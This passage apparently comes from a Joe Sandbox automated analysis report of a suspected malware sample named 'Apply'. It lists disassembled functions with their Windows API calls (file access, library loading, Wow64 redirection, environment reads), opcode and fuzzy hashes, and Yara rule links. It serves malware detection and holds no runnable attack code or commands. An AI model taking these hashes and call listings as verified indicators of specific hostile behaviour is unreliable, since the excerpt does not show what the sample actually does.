SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,00859DE6,?,?,?), ref: 0089F6F4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 96a3195450373f753a3f1263615504283eceef8989b7f0bd37944517e4c129b6
Instruction ID: 0bdddc83e845f9fe3944b53be48e8a96469d1f4cf87f1dbcdadeec3c1c6d7d86
Opcode Fuzzy Hash: 96a3195450373f753a3f1263615504283eceef8989b7f0bd37944517e4c129b6
Instruction Fuzzy Hash: 1F91E170A08209EBDF00DF68C8817A9BBB4FF05311F1881A5EDA9DF286D771E945DB61

Function 008C4924 Relevance: 3.2, APIs: 2, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE

SetErrorMode.KERNEL32(00000001), ref: 008C4985
SetErrorMode.KERNEL32(00000000), ref: 008C4B48

Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ErrorMode$AttributesFile_wcslen
String ID:
API String ID: 4203446100-0
Opcode ID: d818b317e428ef6624296cd014790fe64348fcf74c8fb455779db0177be1dcb2
Instruction ID: d940b1d135434ce1189b04dd32ac7ff10dd9c96670fb234fe1169005417d26e1
Opcode Fuzzy Hash: d818b317e428ef6624296cd014790fe64348fcf74c8fb455779db0177be1dcb2
Instruction Fuzzy Hash: 50613371508340AFC300DF18C491A6AFBE5FF89318F44996EF8998B262D771D989CB92

Function 0086FFC0 Relevance: 3.1, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 0087005D
Sleep.KERNEL32 ref: 0087006F

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID:
API String ID: 1821831730-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 670e704603af4a8be0a82eefe507b38d05c01a878b3d06671c455fcde44069ce
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8631D570A00509DFC718CF58D484A69F7A6FB59364B24C6A5E409CB25AEB32EDC1CFD0

Function 00853989 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00853A5A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 63ee594b49d02e66ec8a309b1fc3965d3e843f8d70641a31c4fdc841bcf40092
Instruction ID: abd28973463949fbe2aae29c260e58b8c31855071a51b317fab134cee2780fe1
Opcode Fuzzy Hash: 63ee594b49d02e66ec8a309b1fc3965d3e843f8d70641a31c4fdc841bcf40092
Instruction Fuzzy Hash: DB3181B05087419FD721EF24D884797BBE4FB49749F00082DE9D9C7240E7B5AA49CB92

Function 00855E02 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008532FC,?,00008000), ref: 00855E30
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,008532FC,?,00008000), ref: 008949F8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fe9a656f1bf24056dd5e9e9428fce3548116395246070ea50a54200aeba2568
Instruction ID: 3118544d22c28cdf523783927659660b0f367c9b184bd6f19aa7606d7eb7de66
Opcode Fuzzy Hash: 0fe9a656f1bf24056dd5e9e9428fce3548116395246070ea50a54200aeba2568
Instruction Fuzzy Hash: 96019E31245225BAE7301A2ACC0EF977F98FF02775F158301BE99AE1E0C7B45959CB90

Function 00881D7C Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 0088D191: GetEnvironmentStringsW.KERNEL32 ref: 0088D195

_free.LIBCMT ref: 00881DBD
_free.LIBCMT ref: 00881DC4

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: _free$EnvironmentStrings
String ID:
API String ID: 3523873077-0
Opcode ID: 93a76ac7b461ca5ea64e119d14f069c3ddb60aa708cf6b97cce7faef57554a06
Instruction ID: 2e91908183b2fd5dab2c3e8f89605b9cb7243c5e0ffeed4343218ae3d0912c58
Opcode Fuzzy Hash: 93a76ac7b461ca5ea64e119d14f069c3ddb60aa708cf6b97cce7faef57554a06
Instruction Fuzzy Hash: 9AE02B67A45D1556AB71B23D7C09B6A164CEFD1374BA0072AFC20C71C2CE5088431397

Function 0085B940 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0085BD7E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: e33d3871a0a3c6a994c11ee34ea9cee8b7a16a967226dfe658df456e045edcb7
Instruction ID: 016a7cdf6c1937eb0f6dcd37e2bca16751bbb8842e3c7d938d836044d406e397
Opcode Fuzzy Hash: e33d3871a0a3c6a994c11ee34ea9cee8b7a16a967226dfe658df456e045edcb7
Instruction Fuzzy Hash: AD32CB74A002099FDB20CF58C884ABAB7B6FF69319F188059ED05EB251D774EE85CF91

Function 0085A400 Relevance: 1.9, APIs: 1, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91afc934c239498037c90cd105694a1a8e177516cd51ec66315b945575dfbfbd
Instruction ID: 2a7deb24a9f910d739320a0ce58eea1e1f12e3ad4be6d6abf417ceeb1d412c43
Opcode Fuzzy Hash: 91afc934c239498037c90cd105694a1a8e177516cd51ec66315b945575dfbfbd
Instruction Fuzzy Hash: 40E1CF71A002199BCF18DF98C880AEEB7B5FF14316F448226ED16EB291E734C949CB57

Function 008D7823 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: b486fbfc7e1abbfb613f068d0eeba2f0e25d96720387700fa9c71f6d79af2d48
Instruction ID: a31fd539fd33491e86272720a1618dfb78144bb286ec93cbc1e88d0ccde5d7f3
Opcode Fuzzy Hash: b486fbfc7e1abbfb613f068d0eeba2f0e25d96720387700fa9c71f6d79af2d48
Instruction Fuzzy Hash: 79D15C75A0420AEFCF14EF98C4819ADBBB5FF04314F14416AE915EB391EB30AE45CB91

Function 0087F0E6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6747e11db40fa1d8616f09be44001e894f24e219702c606445a5e06ef53026a4
Instruction ID: a6921557117da04df182a3791d328d99ee177a54c5c9b689b01a5455f0971065
Opcode Fuzzy Hash: 6747e11db40fa1d8616f09be44001e894f24e219702c606445a5e06ef53026a4
Instruction Fuzzy Hash: 8C510475A14108AFDB10DF69C840AA97BA2FF85364F19C168EA1CDB397C731ED42CB60

Function 008BF9DF Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 008BF9F8

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 9c602cb357bae4e961bd21866af2243c0edc452e9cc609d22f8aa1d6cc5362d3
Instruction ID: 093da8d9e021ae32c67c8ebe3fafcfee391e70949b9b77f472177732d6cf02f2
Opcode Fuzzy Hash: 9c602cb357bae4e961bd21866af2243c0edc452e9cc609d22f8aa1d6cc5362d3
Instruction Fuzzy Hash: F9418172900209AFCB15DF68CC919EEB7B8FF44354B11953AEA5AD7352EB70DE048B50

Function 008554DE Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 008554A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554AF
Part of subcall function 008554A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008554C1
Part of subcall function 008554A3: FreeLibrary.KERNEL32(00000000,?,?,008554F0,?,?,00855184,?,00000001,?,?,00000000), ref: 008554D3

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00855184,?,00000001,?,?,00000000), ref: 00855510

Part of subcall function 0085546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 00855475
Part of subcall function 0085546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00855487
Part of subcall function 0085546C: FreeLibrary.KERNEL32(00000000,?,?,0089466F,?,?,00855184,?,00000001,?,?,00000000), ref: 0085549A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: ed2ce5aa9ac1360caf9efd1049ade0d6e660e55b3120f44d3cc5a36edb930834
Instruction ID: e9fb60dfdff47cb957332a7f8a5a48da2e8b030a44507ed7ccacc0a1f9f5a743
Opcode Fuzzy Hash: ed2ce5aa9ac1360caf9efd1049ade0d6e660e55b3120f44d3cc5a36edb930834
Instruction Fuzzy Hash: C811E776600705AECF24BB28CC12FAD77A6FF50712F60842DF942EA1C1EE709A499B55

Function 00888752 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00888790

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 871c9be2d8e7cc21ed2809a96f625e76cf67bb9d81bba012d8aeb9a873b07fd8
Instruction ID: 96404f60e6e6b6c20c84a06f367c553d491456b3072e20383161e17f1c921860
Opcode Fuzzy Hash: 871c9be2d8e7cc21ed2809a96f625e76cf67bb9d81bba012d8aeb9a873b07fd8
Instruction Fuzzy Hash: CC11067590420AEFCB15EF58E94199A7BF5FF48314F104059F809EB211EA31DA21CB65

Function 00859FE0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,00000000,00000000,?,?,00000000,?,00855B20,?,00010000,00000000,00000000,00000000,00000000), ref: 0085A03C

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ff5c1431ce5558fcb5b0acbe4b977bf582f70717a56c74e0bef88ea935b29eb5
Instruction ID: 22b9ee527ca661dd0ad55c69b61211c3d387c3baabb721e98f9b4ae527cecf7b
Opcode Fuzzy Hash: ff5c1431ce5558fcb5b0acbe4b977bf582f70717a56c74e0bef88ea935b29eb5
Instruction Fuzzy Hash: 12115531200B04DFD7248F05D8C0BA2B7E8FB44365F04852EE9AA8BA81C771E848CB21

Function 00885350 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00884FCD: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00883179,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088500E

_free.LIBCMT ref: 008853BC

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 909a4374356f8f907344afb735ef1ce9beac61351e9b783084be2677b09e34aa
Instruction ID: 189e6d7e598f4ac1f8b427c9a9bc68f5eee1ddacca504ab18b366d44d054d51b
Opcode Fuzzy Hash: 909a4374356f8f907344afb735ef1ce9beac61351e9b783084be2677b09e34aa
Instruction Fuzzy Hash: 750126726047096BE331DE699841A5AFBD9FB8A370F25062DE584C3280EA70A8058765

Function 008519A9 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008527FA,00922408,?,?,?,?,?,?,?,00851727,?), ref: 008519EA

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID:
API String ID: 4019309064-0
Opcode ID: 37c6cd194f6c1c74facd557dee3e6f0f4439ac5dd6dbfb5aaae9e2ad05a79160
Instruction ID: 797c3cc7389524060cbb78f9728a38fe7130829a53df99f0bc779b32ef914af0
Opcode Fuzzy Hash: 37c6cd194f6c1c74facd557dee3e6f0f4439ac5dd6dbfb5aaae9e2ad05a79160
Instruction Fuzzy Hash: EF11A135605329AACF12FBA89846EC977F8FF08355B4040A1BD59E7295EE70D78C8722

Function 0087E952 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
Instruction ID: 61da9879bd20f3a7eaca12b3d0c62b8138e8da33c9f6136e70c171ed426f0fc5
Opcode Fuzzy Hash: b78347c3af4faeddaf6041936be61502238db1ea0e0acd99a45db38c25bd97f7
Instruction Fuzzy Hash: D9F02833501A149AD6313A2E8C05B6A3B98FF86338F108B55FA69D31D2EF70D8068797

Function 008CF674 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 008CF6B1

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: e4ff4981dc1cdb2f2d7aaba0d48dcf3b476d0381587af57e4904ae3c7267630e
Instruction ID: f6ad7893222c30c3d2ff07e3d9e9b0b9e89639dbec7cf25b2c0ed3916c0c8a11
Opcode Fuzzy Hash: e4ff4981dc1cdb2f2d7aaba0d48dcf3b476d0381587af57e4904ae3c7267630e
Instruction Fuzzy Hash: 0CF01D71604204AFCB05EB69DC46D9F7BB8FF45750F404055F509DB261DA70EA458B62

Function 00884FCD Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00883179,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088500E

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c3613916c108c08aef74cde496ddd585889d4d063a11e122eb00d2b5f4714265
Instruction ID: 9df290250d7110770354ef6444e5efa6ee04ef220b6e0a7a1d2d8ab4fb0ece03
Opcode Fuzzy Hash: c3613916c108c08aef74cde496ddd585889d4d063a11e122eb00d2b5f4714265
Instruction Fuzzy Hash: 2EF0E232659E29A7DB317F269C01B5A3748FF417B1B158015BC18EA195CE70EC0197E2

Function 00883B70 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A59,?,0000015D,?,?,?,?,00878590,000000FF,00000000,?,?), ref: 00883BA2

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 25360a10bd09a27f646e015c76d91c35a21a67ef2c3e91d1edfe1ed85266e859
Instruction ID: 784dda881936cac7028d83e13b2f07c279ec7e9f008c04b88c92fd499e05503d
Opcode Fuzzy Hash: 25360a10bd09a27f646e015c76d91c35a21a67ef2c3e91d1edfe1ed85266e859
